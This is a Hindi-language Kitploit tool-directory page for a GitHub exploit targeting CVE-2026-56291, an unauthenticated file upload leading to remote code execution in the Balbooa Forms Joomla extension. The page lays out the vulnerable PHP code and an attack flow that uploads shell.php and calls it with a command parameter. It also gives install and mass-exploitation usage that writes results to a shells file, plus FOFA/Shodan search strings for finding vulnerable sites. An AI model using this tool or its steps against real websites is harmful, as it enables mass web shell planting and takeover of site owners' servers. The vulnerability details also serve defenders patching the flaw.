Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-56291 — Balbooa Forms (com_baforms) < 2.4.1 — form.uploadAttachmentFile के माध्यम से अनधिकृत फ़ाइल अपलोड से RCE | CVSS 9.8 | CISA KEV | Kitploit
उपकरण/GitHubGitHub/shinthink/cve-2026-56291
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubshinthink/cve-2026-56291

CVE-2026-56291

Balbooa Forms (com_baforms) < 2.4.1 — form.uploadAttachmentFile के माध्यम से अनधिकृत फ़ाइल अपलोड से RCE | CVSS 9.8 | CISA KEV

रिपॉजिटरी देखें
21 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-56291 — Balbooa Forms Joomla सामूहिक RCE शोषण

पूर्व-प्रमाणीकरण form.uploadAttachmentFile → कोई CSRF नहीं → PHP अपलोड


अवलोकन

CVE-2026-56291 एक गंभीर (CVSS 9.8) बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड भेद्यता है Balbooa Forms (com_baforms) Joomla एक्सटेंशन (< 2.4.1) में।

form.uploadAttachmentFile फ्रंटएंड कार्य Session::checkToken() को कॉल नहीं करता है या कोई अनुमति जाँच नहीं करता है। अपलोड की गई फ़ाइलें सीधे हमलावर के एक्सटेंशन का उपयोग करती हैं: $fileName = $name . '.' . $ext। फ़ाइलें images/baforms/uploads/form-{id}/ में संग्रहीत होती हैं — सीधे PHP के रूप में निष्पादित की जा सकती हैं।

प्रभावित संस्करण

संस्करणस्थिति
1.0 – 2.4.0असुरक्षित
2.4.1+पैच किया गया

CISA KEV: 10 जुलाई 2026 को जोड़ा गया — सक्रिय शोषण की पुष्टि हुई।


भेद्यता तंत्र

मूल कारण

root@kitploit:~
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext;  // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);

हमला प्रवाह

root@kitploit:~
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
  file = shell.php (multipart)
→ Saved to images/baforms/uploads/form-1/shell.php
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE

स्थापना

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt

उपयोग

root@kitploit:~
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup

FOFA / Shodan

root@kitploit:~
FOFA:   body="com_baforms"
Shodan: http.html:"baforms"

संदर्भ

संसाधनलिंक
CISA KEVcisa.gov/known-exploited-vulnerabilities
फिक्स विवरणmysites.guru
शोधकर्ताPhil Taylor

बाल्बूआ से संबद्ध नहीं।

टूल डाउनलोड करें